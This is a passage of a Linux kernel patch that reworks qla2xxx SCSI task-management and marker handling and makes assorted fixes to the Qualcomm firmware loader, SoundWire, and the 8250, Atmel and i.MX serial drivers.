++	spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
++}
++
++static
++int qla_get_tmf(fc_port_t *fcport)
++{
++	struct scsi_qla_host *vha = fcport->vha;
++	struct qla_hw_data *ha = vha->hw;
++	unsigned long flags;
++	int rc = 0;
++	LIST_HEAD(tmf_elem);
++
++	spin_lock_irqsave(&ha->tgt.sess_lock, flags);
++	list_add_tail(&tmf_elem, &fcport->tmf_pending);
++
++	while (fcport->active_tmf >= MAX_ACTIVE_TMF) {
++		spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
++
++		msleep(1);
++
++		spin_lock_irqsave(&ha->tgt.sess_lock, flags);
++		if (TMF_NOT_READY(fcport)) {
++			ql_log(ql_log_warn, vha, 0x802c,
++			    "Unable to acquire TM resource due to disruption.\n");
++			rc = EIO;
++			break;
++		}
++		if (fcport->active_tmf < MAX_ACTIVE_TMF &&
++		    list_is_first(&tmf_elem, &fcport->tmf_pending))
++			break;
++	}
++
++	list_del(&tmf_elem);
++
++	if (!rc)
++		fcport->active_tmf++;
++
++	spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
++
++	return rc;
++}
++
++int
++qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint64_t lun,
++		     uint32_t tag)
++{
++	struct scsi_qla_host *vha = fcport->vha;
++	struct qla_qpair *qpair;
++	struct tmf_arg a;
++	int i, rval = QLA_SUCCESS;
++
++	if (TMF_NOT_READY(fcport))
++		return QLA_SUSPENDED;
++
++	a.vha = fcport->vha;
++	a.fcport = fcport;
++	a.lun = lun;
++	if (flags & (TCF_LUN_RESET|TCF_ABORT_TASK_SET|TCF_CLEAR_TASK_SET|TCF_CLEAR_ACA)) {
++		a.modifier = MK_SYNC_ID_LUN;
++
++		if (qla_get_tmf(fcport))
++			return QLA_FUNCTION_FAILED;
++	} else {
++		a.modifier = MK_SYNC_ID;
++	}
++
++	if (vha->hw->mqenable) {
++		for (i = 0; i < vha->hw->num_qpairs; i++) {
++			qpair = vha->hw->queue_pair_map[i];
++			if (!qpair)
++				continue;
++
++			if (TMF_NOT_READY(fcport)) {
++				ql_log(ql_log_warn, vha, 0x8026,
++				    "Unable to send TM due to disruption.\n");
++				rval = QLA_SUSPENDED;
++				break;
++			}
++
++			a.qpair = qpair;
++			a.flags = flags|TCF_NOTMCMD_TO_TARGET;
++			rval = __qla2x00_async_tm_cmd(&a);
++			if (rval)
++				break;
++		}
++	}
++
++	if (rval)
++		goto bailout;
++
++	a.qpair = vha->hw->base_qpair;
++	a.flags = flags;
++	rval = __qla2x00_async_tm_cmd(&a);
++
++bailout:
++	if (a.modifier == MK_SYNC_ID_LUN)
++		qla_put_tmf(fcport);
++
++	return rval;
++}
++
+ int
+ qla24xx_async_abort_command(srb_t *sp)
+ {
+@@ -5313,6 +5528,7 @@ qla2x00_alloc_fcport(scsi_qla_host_t *vha, gfp_t flags)
+ 	INIT_WORK(&fcport->reg_work, qla_register_fcport_fn);
+ 	INIT_LIST_HEAD(&fcport->gnl_entry);
+ 	INIT_LIST_HEAD(&fcport->list);
++	INIT_LIST_HEAD(&fcport->tmf_pending);
+ 
+ 	INIT_LIST_HEAD(&fcport->sess_cmd_list);
+ 	spin_lock_init(&fcport->sess_cmd_lock);
+@@ -5355,7 +5571,7 @@ static void qla_get_login_template(scsi_qla_host_t *vha)
+ 	__be32 *q;
+ 
+ 	memset(ha->init_cb, 0, ha->init_cb_size);
+-	sz = min_t(int, sizeof(struct fc_els_flogi), ha->init_cb_size);
++	sz = min_t(int, sizeof(struct fc_els_csp), ha->init_cb_size);
+ 	rval = qla24xx_get_port_login_templ(vha, ha->init_cb_dma,
+ 					    ha->init_cb, sz);
+ 	if (rval != QLA_SUCCESS) {
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index b0ee307b5d4b9..a034699e58ae9 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -109,11 +109,13 @@ qla2x00_set_fcport_disc_state(fc_port_t *fcport, int state)
+ {
+ 	int old_val;
+ 	uint8_t shiftbits, mask;
++	uint8_t port_dstate_str_sz;
+ 
+ 	/* This will have to change when the max no. of states > 16 */
+ 	shiftbits = 4;
+ 	mask = (1 << shiftbits) - 1;
+ 
++	port_dstate_str_sz = sizeof(port_dstate_str) / sizeof(char *);
+ 	fcport->disc_state = state;
+ 	while (1) {
+ 		old_val = atomic_read(&fcport->shadow_disc_state);
+@@ -121,7 +123,8 @@ qla2x00_set_fcport_disc_state(fc_port_t *fcport, int state)
+ 		    old_val, (old_val << shiftbits) | state)) {
+ 			ql_dbg(ql_dbg_disc, fcport->vha, 0x2134,
+ 			    "FCPort %8phC disc_state transition: %s to %s - portid=%06x.\n",
+-			    fcport->port_name, port_dstate_str[old_val & mask],
++			    fcport->port_name, (old_val & mask) < port_dstate_str_sz ?
++				    port_dstate_str[old_val & mask] : "Unknown",
+ 			    port_dstate_str[state], fcport->d_id.b24);
+ 			return;
+ 		}
+diff --git a/drivers/scsi/qla2xxx/qla_iocb.c b/drivers/scsi/qla2xxx/qla_iocb.c
+index 4f48f098ea5a6..c9a686f06d29d 100644
+--- a/drivers/scsi/qla2xxx/qla_iocb.c
++++ b/drivers/scsi/qla2xxx/qla_iocb.c
+@@ -522,21 +522,25 @@ __qla2x00_marker(struct scsi_qla_host *vha, struct qla_qpair *qpair,
+ 		return (QLA_FUNCTION_FAILED);
+ 	}
+ 
++	mrk24 = (struct mrk_entry_24xx *)mrk;
++
+ 	mrk->entry_type = MARKER_TYPE;
+ 	mrk->modifier = type;
+ 	if (type != MK_SYNC_ALL) {
+ 		if (IS_FWI2_CAPABLE(ha)) {
+-			mrk24 = (struct mrk_entry_24xx *) mrk;
+ 			mrk24->nport_handle = cpu_to_le16(loop_id);
+ 			int_to_scsilun(lun, (struct scsi_lun *)&mrk24->lun);
+ 			host_to_fcp_swap(mrk24->lun, sizeof(mrk24->lun));
+ 			mrk24->vp_index = vha->vp_idx;
+-			mrk24->handle = make_handle(req->id, mrk24->handle);
+ 		} else {
+ 			SET_TARGET_ID(ha, mrk->target, loop_id);
+ 			mrk->lun = cpu_to_le16((uint16_t)lun);
+ 		}
+ 	}
++
++	if (IS_FWI2_CAPABLE(ha))
++		mrk24->handle = QLA_SKIP_HANDLE;
++
+ 	wmb();
+ 
+ 	qla2x00_start_iocbs(vha, req);
+@@ -603,7 +607,8 @@ qla24xx_build_scsi_type_6_iocbs(srb_t *sp, struct cmd_type_6 *cmd_pkt,
+ 	put_unaligned_le32(COMMAND_TYPE_6, &cmd_pkt->entry_type);
+ 
+ 	/* No data transfer */
+-	if (!scsi_bufflen(cmd) || cmd->sc_data_direction == DMA_NONE) {
++	if (!scsi_bufflen(cmd) || cmd->sc_data_direction == DMA_NONE ||
++	    tot_dsds == 0) {
+ 		cmd_pkt->byte_count = cpu_to_le32(0);
+ 		return 0;
+ 	}
+@@ -2541,7 +2546,7 @@ qla24xx_tm_iocb(srb_t *sp, struct tsk_mgmt_entry *tsk)
+ 	scsi_qla_host_t *vha = fcport->vha;
+ 	struct qla_hw_data *ha = vha->hw;
+ 	struct srb_iocb *iocb = &sp->u.iocb_cmd;
+-	struct req_que *req = vha->req;
++	struct req_que *req = sp->qpair->req;
+ 
+ 	flags = iocb->u.tmf.flags;
+ 	lun = iocb->u.tmf.lun;
+@@ -2557,7 +2562,8 @@ qla24xx_tm_iocb(srb_t *sp, struct tsk_mgmt_entry *tsk)
+ 	tsk->port_id[2] = fcport->d_id.b.domain;
+ 	tsk->vp_index = fcport->vha->vp_idx;
+ 
+-	if (flags == TCF_LUN_RESET) {
++	if (flags & (TCF_LUN_RESET | TCF_ABORT_TASK_SET|
++	    TCF_CLEAR_TASK_SET|TCF_CLEAR_ACA)) {
+ 		int_to_scsilun(lun, &tsk->lun);
+ 		host_to_fcp_swap((uint8_t *)&tsk->lun,
+ 			sizeof(tsk->lun));
+@@ -3858,9 +3864,9 @@ int qla_get_iocbs_resource(struct srb *sp)
+ 	case SRB_NACK_LOGO:
+ 	case SRB_LOGOUT_CMD:
+ 	case SRB_CTRL_VP:
+-		push_it_through = true;
+-		fallthrough;
++	case SRB_MARKER:
+ 	default:
++		push_it_through = true;
+ 		get_exch = false;
+ 	}
+ 
+@@ -3876,6 +3882,19 @@ int qla_get_iocbs_resource(struct srb *sp)
+ 	return qla_get_fw_resources(sp->qpair, &sp->iores);
+ }
+ 
++static void
++qla_marker_iocb(srb_t *sp, struct mrk_entry_24xx *mrk)
++{
++	mrk->entry_type = MARKER_TYPE;
++	mrk->modifier = sp->u.iocb_cmd.u.tmf.modifier;
++	if (sp->u.iocb_cmd.u.tmf.modifier != MK_SYNC_ALL) {
++		mrk->nport_handle = cpu_to_le16(sp->u.iocb_cmd.u.tmf.loop_id);
++		int_to_scsilun(sp->u.iocb_cmd.u.tmf.lun, (struct scsi_lun *)&mrk->lun);
++		host_to_fcp_swap(mrk->lun, sizeof(mrk->lun));
++		mrk->vp_index = sp->u.iocb_cmd.u.tmf.vp_index;
++	}
++}
++
+ int
+ qla2x00_start_sp(srb_t *sp)
+ {
+@@ -3898,7 +3917,7 @@ qla2x00_start_sp(srb_t *sp)
+ 
+ 	pkt = __qla2x00_alloc_iocbs(sp->qpair, sp);
+ 	if (!pkt) {
+-		rval = EAGAIN;
++		rval = -EAGAIN;
+ 		ql_log(ql_log_warn, vha, 0x700c,
+ 		    "qla2x00_alloc_iocbs failed.\n");
+ 		goto done;
+@@ -3979,6 +3998,9 @@ qla2x00_start_sp(srb_t *sp)
+ 	case SRB_SA_REPLACE:
+ 		qla24xx_sa_replace_iocb(sp, pkt);
+ 		break;
++	case SRB_MARKER:
++		qla_marker_iocb(sp, pkt);
++		break;
+ 	default:
+ 		break;
+ 	}
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index 86928a762a7a6..b41d604ca9bc8 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -1862,9 +1862,9 @@ qla2x00_process_completed_request(struct scsi_qla_host *vha,
+ 	}
+ }
+ 
+-srb_t *
+-qla2x00_get_sp_from_handle(scsi_qla_host_t *vha, const char *func,
+-    struct req_que *req, void *iocb)
++static srb_t *
++qla_get_sp_from_handle(scsi_qla_host_t *vha, const char *func,
++		       struct req_que *req, void *iocb, u16 *ret_index)
+ {
+ 	struct qla_hw_data *ha = vha->hw;
+ 	sts_entry_t *pkt = iocb;
+@@ -1899,12 +1899,25 @@ qla2x00_get_sp_from_handle(scsi_qla_host_t *vha, const char *func,
+ 		return NULL;
+ 	}
+ 
+-	req->outstanding_cmds[index] = NULL;
+-
++	*ret_index = index;
+ 	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	return sp;
+ }
+ 
++srb_t *
++qla2x00_get_sp_from_handle(scsi_qla_host_t *vha, const char *func,
++			   struct req_que *req, void *iocb)
++{
++	uint16_t index;
++	srb_t *sp;
++
++	sp = qla_get_sp_from_handle(vha, func, req, iocb, &index);
++	if (sp)
++		req->outstanding_cmds[index] = NULL;
++
++	return sp;
++}
++
+ static void
+ qla2x00_mbx_iocb_entry(scsi_qla_host_t *vha, struct req_que *req,
+     struct mbx_entry *mbx)
+@@ -3237,13 +3250,13 @@ qla2x00_status_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, void *pkt)
+ 		return;
+ 	}
+ 
+-	req->outstanding_cmds[handle] = NULL;
+ 	cp = GET_CMD_SP(sp);
+ 	if (cp == NULL) {
+ 		ql_dbg(ql_dbg_io, vha, 0x3018,
+ 		    "Command already returned (0x%x/%p).\n",
+ 		    sts->handle, sp);
+ 
++		req->outstanding_cmds[handle] = NULL;
+ 		return;
+ 	}
+ 
+@@ -3514,6 +3527,9 @@ out:
+ 
+ 	if (rsp->status_srb == NULL)
+ 		sp->done(sp, res);
++
++	/* for io's, clearing of outstanding_cmds[handle] means scsi_done was called */
++	req->outstanding_cmds[handle] = NULL;
+ }
+ 
+ /**
+@@ -3590,6 +3606,7 @@ qla2x00_error_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, sts_entry_t *pkt)
+ 	uint16_t que = MSW(pkt->handle);
+ 	struct req_que *req = NULL;
+ 	int res = DID_ERROR << 16;
++	u16 index;
+ 
+ 	ql_dbg(ql_dbg_async, vha, 0x502a,
+ 	    "iocb type %xh with error status %xh, handle %xh, rspq id %d\n",
+@@ -3608,7 +3625,6 @@ qla2x00_error_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, sts_entry_t *pkt)
+ 
+ 	switch (pkt->entry_type) {
+ 	case NOTIFY_ACK_TYPE:
+-	case STATUS_TYPE:
+ 	case STATUS_CONT_TYPE:
+ 	case LOGINOUT_PORT_IOCB_TYPE:
+ 	case CT_IOCB_TYPE:
+@@ -3628,6 +3644,14 @@ qla2x00_error_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, sts_entry_t *pkt)
+ 	case CTIO_TYPE7:
+ 	case CTIO_CRC2:
+ 		return 1;
++	case STATUS_TYPE:
++		sp = qla_get_sp_from_handle(vha, func, req, pkt, &index);
++		if (sp) {
++			sp->done(sp, res);
++			req->outstanding_cmds[index] = NULL;
++			return 0;
++		}
++		break;
+ 	}
+ fatal:
+ 	ql_log(ql_log_warn, vha, 0x5030,
+@@ -3750,6 +3774,28 @@ static int qla_chk_cont_iocb_avail(struct scsi_qla_host *vha,
+ 	return rc;
+ }
+ 
++static void qla_marker_iocb_entry(scsi_qla_host_t *vha, struct req_que *req,
++	struct mrk_entry_24xx *pkt)
++{
++	const char func[] = "MRK-IOCB";
++	srb_t *sp;
++	int res = QLA_SUCCESS;
++
++	if (!IS_FWI2_CAPABLE(vha->hw))
++		return;
++
++	sp = qla2x00_get_sp_from_handle(vha, func, req, pkt);
++	if (!sp)
++		return;
++
++	if (pkt->entry_status) {
++		ql_dbg(ql_dbg_taskm, vha, 0x8025, "marker failure.\n");
++		res = QLA_COMMAND_ERROR;
++	}
++	sp->u.iocb_cmd.u.tmf.data = res;
++	sp->done(sp, res);
++}
++
+ /**
+  * qla24xx_process_response_queue() - Process response queue entries.
+  * @vha: SCSI driver HA context
+@@ -3864,9 +3910,7 @@ process_err:
+ 					(struct nack_to_isp *)pkt);
+ 			break;
+ 		case MARKER_TYPE:
+-			/* Do nothing in this case, this check is to prevent it
+-			 * from falling into default case
+-			 */
++			qla_marker_iocb_entry(vha, rsp->req, (struct mrk_entry_24xx *)pkt);
+ 			break;
+ 		case ABORT_IOCB_TYPE:
+ 			qla24xx_abort_iocb_entry(vha, rsp->req,
+diff --git a/drivers/scsi/qla2xxx/qla_nvme.c b/drivers/scsi/qla2xxx/qla_nvme.c
+index c57e02a355219..57545d5e82b9d 100644
+--- a/drivers/scsi/qla2xxx/qla_nvme.c
++++ b/drivers/scsi/qla2xxx/qla_nvme.c
+@@ -360,7 +360,6 @@ static int qla_nvme_ls_req(struct nvme_fc_local_port *lport,
+ 	if (rval != QLA_SUCCESS) {
+ 		ql_log(ql_log_warn, vha, 0x700e,
+ 		    "qla2x00_start_sp failed = %d\n", rval);
+-		wake_up(&sp->nvme_ls_waitq);
+ 		sp->priv = NULL;
+ 		priv->sp = NULL;
+ 		qla2x00_rel_sp(sp);
+@@ -648,7 +647,6 @@ static int qla_nvme_post_cmd(struct nvme_fc_local_port *lport,
+ 	if (!sp)
+ 		return -EBUSY;
+ 
+-	init_waitqueue_head(&sp->nvme_ls_waitq);
+ 	kref_init(&sp->cmd_kref);
+ 	spin_lock_init(&priv->cmd_lock);
+ 	sp->priv = priv;
+@@ -667,7 +665,6 @@ static int qla_nvme_post_cmd(struct nvme_fc_local_port *lport,
+ 	if (rval != QLA_SUCCESS) {
+ 		ql_log(ql_log_warn, vha, 0x212d,
+ 		    "qla2x00_start_nvme_mq failed = %d\n", rval);
+-		wake_up(&sp->nvme_ls_waitq);
+ 		sp->priv = NULL;
+ 		priv->sp = NULL;
+ 		qla2xxx_rel_qpair_sp(sp->qpair, sp);
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 08dc825fbf4f6..ed70eb8847864 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -1068,43 +1068,6 @@ qc24_fail_command:
+ 	return 0;
+ }
+ 
+-/*
+- * qla2x00_eh_wait_on_command
+- *    Waits for the command to be returned by the Firmware for some
+- *    max time.
+- *
+- * Input:
+- *    cmd = Scsi Command to wait on.
+- *
+- * Return:
+- *    Completed in time : QLA_SUCCESS
+- *    Did not complete in time : QLA_FUNCTION_FAILED
+- */
+-static int
+-qla2x00_eh_wait_on_command(struct scsi_cmnd *cmd)
+-{
+-#define ABORT_POLLING_PERIOD	1000
+-#define ABORT_WAIT_ITER		((2 * 1000) / (ABORT_POLLING_PERIOD))
+-	unsigned long wait_iter = ABORT_WAIT_ITER;
+-	scsi_qla_host_t *vha = shost_priv(cmd->device->host);
+-	struct qla_hw_data *ha = vha->hw;
+-	srb_t *sp = scsi_cmd_priv(cmd);
+-	int ret = QLA_SUCCESS;
+-
+-	if (unlikely(pci_channel_offline(ha->pdev)) || ha->flags.eeh_busy) {
+-		ql_dbg(ql_dbg_taskm, vha, 0x8005,
+-		    "Return:eh_wait.\n");
+-		return ret;
+-	}
+-
+-	while (sp->type && wait_iter--)
+-		msleep(ABORT_POLLING_PERIOD);
+-	if (sp->type)
+-		ret = QLA_FUNCTION_FAILED;
+-
+-	return ret;
+-}
+-
+ /*
+  * qla2x00_wait_for_hba_online
+  *    Wait till the HBA is online after going through
+@@ -1355,6 +1318,9 @@ qla2xxx_eh_abort(struct scsi_cmnd *cmd)
+ 	return ret;
+ }
+ 
++#define ABORT_POLLING_PERIOD	1000
++#define ABORT_WAIT_ITER		((2 * 1000) / (ABORT_POLLING_PERIOD))
++
+ /*
+  * Returns: QLA_SUCCESS or QLA_FUNCTION_FAILED.
+  */
+@@ -1368,41 +1334,73 @@ __qla2x00_eh_wait_for_pending_commands(struct qla_qpair *qpair, unsigned int t,
+ 	struct req_que *req = qpair->req;
+ 	srb_t *sp;
+ 	struct scsi_cmnd *cmd;
++	unsigned long wait_iter = ABORT_WAIT_ITER;
++	bool found;
++	struct qla_hw_data *ha = vha->hw;
+ 
+ 	status = QLA_SUCCESS;
+ 
+-	spin_lock_irqsave(qpair->qp_lock_ptr, flags);
+-	for (cnt = 1; status == QLA_SUCCESS &&
+-		cnt < req->num_outstanding_cmds; cnt++) {
+-		sp = req->outstanding_cmds[cnt];
+-		if (!sp)
+-			continue;
+-		if (sp->type != SRB_SCSI_CMD)
+-			continue;
+-		if (vha->vp_idx != sp->vha->vp_idx)
+-			continue;
+-		match = 0;
+-		cmd = GET_CMD_SP(sp);
+-		switch (type) {
+-		case WAIT_HOST:
+-			match = 1;
+-			break;
+-		case WAIT_TARGET:
+-			match = cmd->device->id == t;
+-			break;
+-		case WAIT_LUN:
+-			match = (cmd->device->id == t &&
+-				cmd->device->lun == l);
+-			break;
+-		}
+-		if (!match)
+-			continue;
++	while (wait_iter--) {
++		found = false;
+ 
+-		spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
+-		status = qla2x00_eh_wait_on_command(cmd);
+ 		spin_lock_irqsave(qpair->qp_lock_ptr, flags);
++		for (cnt = 1; cnt < req->num_outstanding_cmds; cnt++) {
++			sp = req->outstanding_cmds[cnt];
++			if (!sp)
++				continue;
++			if (sp->type != SRB_SCSI_CMD)
++				continue;
++			if (vha->vp_idx != sp->vha->vp_idx)
++				continue;
++			match = 0;
++			cmd = GET_CMD_SP(sp);
++			switch (type) {
++			case WAIT_HOST:
++				match = 1;
++				break;
++			case WAIT_TARGET:
++				if (sp->fcport)
++					match = sp->fcport->d_id.b24 == t;
++				else
++					match = 0;
++				break;
++			case WAIT_LUN:
++				if (sp->fcport)
++					match = (sp->fcport->d_id.b24 == t &&
++						cmd->device->lun == l);
++				else
++					match = 0;
++				break;
++			}
++			if (!match)
++				continue;
++
++			spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
++
++			if (unlikely(pci_channel_offline(ha->pdev)) ||
++			    ha->flags.eeh_busy) {
++				ql_dbg(ql_dbg_taskm, vha, 0x8005,
++				    "Return:eh_wait.\n");
++				return status;
++			}
++
++			/*
++			 * SRB_SCSI_CMD is still in the outstanding_cmds array.
++			 * it means scsi_done has not called. Wait for it to
++			 * clear from outstanding_cmds.
++			 */
++			msleep(ABORT_POLLING_PERIOD);
++			spin_lock_irqsave(qpair->qp_lock_ptr, flags);
++			found = true;
++		}
++		spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
++
++		if (!found)
++			break;
+ 	}
+-	spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
++
++	if (wait_iter == -1)
++		status = QLA_FUNCTION_FAILED;
+ 
+ 	return status;
+ }
+@@ -5076,7 +5074,8 @@ struct scsi_qla_host *qla2x00_create_host(struct scsi_host_template *sht,
+ 	}
+ 	INIT_DELAYED_WORK(&vha->scan.scan_work, qla_scan_work_fn);
+ 
+-	sprintf(vha->host_str, "%s_%lu", QLA2XXX_DRIVER_NAME, vha->host_no);
++	snprintf(vha->host_str, sizeof(vha->host_str), "%s_%lu",
++		 QLA2XXX_DRIVER_NAME, vha->host_no);
+ 	ql_dbg(ql_dbg_init, vha, 0x0041,
+ 	    "Allocated the host=%p hw=%p vha=%p dev_name=%s",
+ 	    vha->host, vha->hw, vha,
+diff --git a/drivers/soc/qcom/mdt_loader.c b/drivers/soc/qcom/mdt_loader.c
+index 3f11554df2f38..10235b36d1312 100644
+--- a/drivers/soc/qcom/mdt_loader.c
++++ b/drivers/soc/qcom/mdt_loader.c
+@@ -210,6 +210,7 @@ int qcom_mdt_pas_init(struct device *dev, const struct firmware *fw,
+ 	const struct elf32_hdr *ehdr;
+ 	phys_addr_t min_addr = PHYS_ADDR_MAX;
+ 	phys_addr_t max_addr = 0;
++	bool relocate = false;
+ 	size_t metadata_len;
+ 	void *metadata;
+ 	int ret;
+@@ -224,6 +225,9 @@ int qcom_mdt_pas_init(struct device *dev, const struct firmware *fw,
+ 		if (!mdt_phdr_valid(phdr))
+ 			continue;
+ 
++		if (phdr->p_flags & QCOM_MDT_RELOCATABLE)
++			relocate = true;
++
+ 		if (phdr->p_paddr < min_addr)
+ 			min_addr = phdr->p_paddr;
+ 
+@@ -246,11 +250,13 @@ int qcom_mdt_pas_init(struct device *dev, const struct firmware *fw,
+ 		goto out;
+ 	}
+ 
+-	ret = qcom_scm_pas_mem_setup(pas_id, mem_phys, max_addr - min_addr);
+-	if (ret) {
+-		/* Unable to set up relocation */
+-		dev_err(dev, "error %d setting up firmware %s\n", ret, fw_name);
+-		goto out;
++	if (relocate) {
++		ret = qcom_scm_pas_mem_setup(pas_id, mem_phys, max_addr - min_addr);
++		if (ret) {
++			/* Unable to set up relocation */
++			dev_err(dev, "error %d setting up firmware %s\n", ret, fw_name);
++			goto out;
++		}
+ 	}
+ 
+ out:
+diff --git a/drivers/soundwire/qcom.c b/drivers/soundwire/qcom.c
+index b2eb3090f4b46..08934d27f709e 100644
+--- a/drivers/soundwire/qcom.c
++++ b/drivers/soundwire/qcom.c
+@@ -167,7 +167,8 @@ struct qcom_swrm_ctrl {
+ 	u32 intr_mask;
+ 	u8 rcmd_id;
+ 	u8 wcmd_id;
+-	struct qcom_swrm_port_config pconfig[QCOM_SDW_MAX_PORTS];
++	/* Port numbers are 1 - 14 */
++	struct qcom_swrm_port_config pconfig[QCOM_SDW_MAX_PORTS + 1];
+ 	struct sdw_stream_runtime *sruntime[SWRM_MAX_DAIS];
+ 	enum sdw_slave_status status[SDW_MAX_DEVICES + 1];
+ 	int (*reg_read)(struct qcom_swrm_ctrl *ctrl, int reg, u32 *val);
+diff --git a/drivers/tty/serial/8250/8250.h b/drivers/tty/serial/8250/8250.h
+index 1e8fe44a7099f..eeb7b43ebe539 100644
+--- a/drivers/tty/serial/8250/8250.h
++++ b/drivers/tty/serial/8250/8250.h
+@@ -91,7 +91,6 @@ struct serial8250_config {
+ #define UART_BUG_TXEN	BIT(1)	/* UART has buggy TX IIR status */
+ #define UART_BUG_NOMSR	BIT(2)	/* UART has buggy MSR status bits (Au1x00) */
+ #define UART_BUG_THRE	BIT(3)	/* UART has buggy THRE reassertion */
+-#define UART_BUG_PARITY	BIT(4)	/* UART mishandles parity if FIFO enabled */
+ #define UART_BUG_TXRACE	BIT(5)	/* UART Tx fails to set remote DR */
+ 
+ 
+diff --git a/drivers/tty/serial/8250/8250_pci.c b/drivers/tty/serial/8250/8250_pci.c
+index cd27821f54ec2..0ea89df6702f6 100644
+--- a/drivers/tty/serial/8250/8250_pci.c
++++ b/drivers/tty/serial/8250/8250_pci.c
+@@ -1252,14 +1252,6 @@ static int pci_oxsemi_tornado_setup(struct serial_private *priv,
+ 	return pci_default_setup(priv, board, up, idx);
+ }
+ 
+-static int pci_asix_setup(struct serial_private *priv,
+-		  const struct pciserial_board *board,
+-		  struct uart_8250_port *port, int idx)
+-{
+-	port->bugs |= UART_BUG_PARITY;
+-	return pci_default_setup(priv, board, port, idx);
+-}
+-
+ #define QPCR_TEST_FOR1		0x3F
+ #define QPCR_TEST_GET1		0x00
+ #define QPCR_TEST_FOR2		0x40
+@@ -1975,7 +1967,6 @@ pci_moxa_setup(struct serial_private *priv,
+ #define PCI_DEVICE_ID_WCH_CH355_4S	0x7173
+ #define PCI_VENDOR_ID_AGESTAR		0x5372
+ #define PCI_DEVICE_ID_AGESTAR_9375	0x6872
+-#define PCI_VENDOR_ID_ASIX		0x9710
+ #define PCI_DEVICE_ID_BROADCOM_TRUMANAGE 0x160a
+ #define PCI_DEVICE_ID_AMCC_ADDIDATA_APCI7800 0x818e
+ 
+@@ -2620,16 +2611,6 @@ static struct pci_serial_quirk pci_serial_quirks[] = {
+ 		.exit		= pci_wch_ch38x_exit,
+ 		.setup          = pci_wch_ch38x_setup,
+ 	},
+-	/*
+-	 * ASIX devices with FIFO bug
+-	 */
+-	{
+-		.vendor		= PCI_VENDOR_ID_ASIX,
+-		.device		= PCI_ANY_ID,
+-		.subvendor	= PCI_ANY_ID,
+-		.subdevice	= PCI_ANY_ID,
+-		.setup		= pci_asix_setup,
+-	},
+ 	/*
+ 	 * Broadcom TruManage (NetXtreme)
+ 	 */
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index b8e8a96c3eb63..acf578aa9930b 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -2629,11 +2629,8 @@ static unsigned char serial8250_compute_lcr(struct uart_8250_port *up,
+ 
+ 	if (c_cflag & CSTOPB)
+ 		cval |= UART_LCR_STOP;
+-	if (c_cflag & PARENB) {
++	if (c_cflag & PARENB)
+ 		cval |= UART_LCR_PARITY;
+-		if (up->bugs & UART_BUG_PARITY)
+-			up->fifo_bug = true;
+-	}
+ 	if (!(c_cflag & PARODD))
+ 		cval |= UART_LCR_EPAR;
+ 	if (c_cflag & CMSPAR)
+@@ -2794,8 +2791,7 @@ serial8250_do_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	up->lcr = cval;					/* Save computed LCR */
+ 
+ 	if (up->capabilities & UART_CAP_FIFO && port->fifosize > 1) {
+-		/* NOTE: If fifo_bug is not set, a user can set RX_trigger. */
+-		if ((baud < 2400 && !up->dma) || up->fifo_bug) {
++		if (baud < 2400 && !up->dma) {
+ 			up->fcr &= ~UART_FCR_TRIGGER_MASK;
+ 			up->fcr |= UART_FCR_TRIGGER_1;
+ 		}
+@@ -3131,8 +3127,7 @@ static int do_set_rxtrig(struct tty_port *port, unsigned char bytes)
+ 	struct uart_8250_port *up = up_to_u8250p(uport);
+ 	int rxtrig;
+ 
+-	if (!(up->capabilities & UART_CAP_FIFO) || uport->fifosize <= 1 ||
+-	    up->fifo_bug)
++	if (!(up->capabilities & UART_CAP_FIFO) || uport->fifosize <= 1)
+ 		return -EINVAL;
+ 
+ 	rxtrig = bytes_to_fcr_rxtrig(up, bytes);
+diff --git a/drivers/tty/serial/atmel_serial.c b/drivers/tty/serial/atmel_serial.c
+index cff64e5edee26..fbce8ef205ce6 100644
+--- a/drivers/tty/serial/atmel_serial.c
++++ b/drivers/tty/serial/atmel_serial.c
+@@ -880,11 +880,11 @@ static void atmel_complete_tx_dma(void *arg)
+ 
+ 	port->icount.tx += atmel_port->tx_len;
+ 
+-	spin_lock_irq(&atmel_port->lock_tx);
++	spin_lock(&atmel_port->lock_tx);
+ 	async_tx_ack(atmel_port->desc_tx);
+ 	atmel_port->cookie_tx = -EINVAL;
+ 	atmel_port->desc_tx = NULL;
+-	spin_unlock_irq(&atmel_port->lock_tx);
++	spin_unlock(&atmel_port->lock_tx);
+ 
+ 	if (uart_circ_chars_pending(xmit) < WAKEUP_CHARS)
+ 		uart_write_wakeup(port);
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index f07c4f9ff13c0..d2137f6eff327 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -397,6 +397,16 @@ static void start_hrtimer_ms(struct hrtimer *hrt, unsigned long msec)
+        hrtimer_start(hrt, ms_to_ktime(msec), HRTIMER_MODE_REL);
+ }
+ 
++static void imx_uart_disable_loopback_rs485(struct imx_port *sport)
++{
++	unsigned int uts;
++
++	/* See SER_RS485_ENABLED/UTS_LOOP comment in imx_uart_probe() */
++	uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
